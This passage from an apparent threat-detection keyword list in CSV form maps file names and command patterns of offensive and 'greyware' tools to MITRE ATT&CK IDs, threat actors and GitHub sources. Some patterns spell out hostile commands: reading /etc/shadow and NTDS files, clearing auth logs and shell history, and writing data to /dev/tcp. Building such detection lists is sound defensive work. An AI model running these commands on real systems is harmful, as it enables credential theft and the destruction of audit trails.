T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_PORTSCAN*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_TOKEN_STOLEN*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CallBackDump*dumpXor*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*CallbackDump.exe*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*can_flood_frames*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*CandyPotato.exe *,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,0,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*canix1/ADACLScanner*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*Cannot enumerate antivirus*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*capcom_sys_exec*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*capcom_sys_exec.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*CaptainNox/Hypnos*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,1,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*captcha-killer.*.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*CapturedCredential.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedCredential.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedHashCredential.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedPasswordCredential.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedTicketCredential.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*capturetokenphish.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*capturetokenphish.py*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*CarbonCopy*,offensive_tool_keyword,CarbonCopy,A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux,T1606 - T1553 - T1105 - T1027 - T1562,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/paranoidninja/CarbonCopy,1,0,N/A,N/A,10,1185,276,2020-10-03T03:23:20Z,2018-11-14T04:48:10Z -*CarbonCopy.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*cardano2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*careCrow*_linux_amd64*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*cargo install glit*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*carlospolop/PurplePanda*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*cat *.atftp_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.atftp_history*,greyware_tool_keyword,cat,show atftp history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.bash_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.bash_history*,greyware_tool_keyword,cat,show bash history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.bin | base64 -w 0 > *.txt*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,0,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*cat *.mysql_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.mysql_history*,greyware_tool_keyword,cat,show mysql history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.nano_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.nano_history*,greyware_tool_keyword,cat,show nano history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.ntds,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*cat *.php_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.php_history*,greyware_tool_keyword,cat,show php history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.zsh_history*,greyware_tool_keyword,cat,show zsh history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.zsh_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cat *bash-history*,greyware_tool_keyword,cat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,0,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*cat /dev/null > *bash_history*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*cat /dev/null > /var/log/auth.log*,greyware_tool_keyword,cat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /dev/null > ~/.bash_history*,greyware_tool_keyword,cat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /etc/passwd*,greyware_tool_keyword,cat,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /etc/shadow*,greyware_tool_keyword,cat,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /etc/sudoers*,greyware_tool_keyword,cat,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat > /dev/tcp/127.0.0.1*<*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*catphish.rb*,offensive_tool_keyword,catphish,Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.,T1565 - T1566 - T1567 - T1596,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ring0lab/catphish,1,1,N/A,N/A,6,583,131,2018-10-16T12:57:25Z,2016-10-24T22:48:51Z -*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*CB561720-0175-49D9-A114-FE3489C53661*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*CC127443-2519-4E04-8865-A6887658CDE5*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*cc2_keystrokes*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_keystrokes_*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_mimipenguin.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system 